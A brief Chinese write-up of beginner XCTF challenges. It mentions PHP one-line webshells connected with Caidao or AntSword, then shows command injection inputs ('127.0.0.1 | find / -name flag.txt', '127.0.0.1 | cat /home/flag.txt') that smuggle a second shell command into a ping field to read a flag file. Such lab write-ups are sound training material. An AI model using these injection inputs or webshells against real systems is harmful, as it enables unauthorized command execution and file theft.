2020.3.17 XCTF的基础题

题目描述2020.3.17 XCTF的基础题目标:了解php一句话木马、如何使用webshell
我们这里使用菜刀进行连接(也可以用蚁剑):
2020.3.17 XCTF的基础题2020.3.17 XCTF的基础题题目描述:
2020.3.17 XCTF的基础题这是远程命令执行(rec),我给个pikachu的讲解视频,里面讲的很基础,很适合像我这种零基础的小白。

pikachu

步骤:
1.打开浏览器,在文本框内输入127.0.0.1 | find / -name “flag.txt” (将 | 替换成 & 或 && 都可以),查找flag所在位置,
2020.3.17 XCTF的基础题2.在文本框内输入 127.0.0.1 | cat /home/flag.txt 可得到flag,如图所示。
2020.3.17 XCTF的基础题